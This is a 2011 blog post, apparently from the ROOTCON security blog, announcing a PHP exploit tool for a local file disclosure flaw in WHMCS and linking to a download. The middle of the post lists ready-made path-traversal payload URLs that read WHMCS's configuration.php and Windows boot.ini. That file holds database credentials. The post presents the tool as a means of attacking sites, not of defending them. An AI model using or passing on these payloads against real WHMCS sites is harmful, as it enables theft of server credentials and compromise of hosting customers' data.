Pages

Tuesday, November 29, 2011

ProjectX WHMCS Exploit Tool


With the growing attacks of Local File Disclosure for WHMCS, I recently posted a Python Script which checks the vulnerability of a website powered  by WHMCS which my friend and I coded but I decided to dump it. 


But with the help of another friend whose name is lufi, we were able to materialize the same tool but this time it is coded in PHP and is user friendly. It is still aimed at exploiting WHMCS but we allow users to choose their own payload. 

Here are some payloads that may come in handy:
cart.php?a=projectx&templatefile=../../../configuration.php"
clients/cart.php?a=projectx&templatefile=../../../configuration.php"
submitticket.php?step=projectx&templatefile=../../../../../../../../../boot.ini
clientarea.php?action=projectx&templatefile=../../configuration.php
reports.php?report=../../../../../../../boot.ini

You can download the full script here


About the Contributor:
Shipcode is a prolific blogger of ROOTCON and at the same time an InfoSec enthusiast from Cebu. He was inspired to join ROOTCON as part of the core team to share his knowledge in information security.  He encourages other like minded individuals to come forward and share their knowledge through blogging right here at ROOTCON Blog section.

ROOTCON is managed by like minded InfoSec professionals across the Philippines.  All rights reserved. Designated trademarks, brands and articles are the property of their respective owners.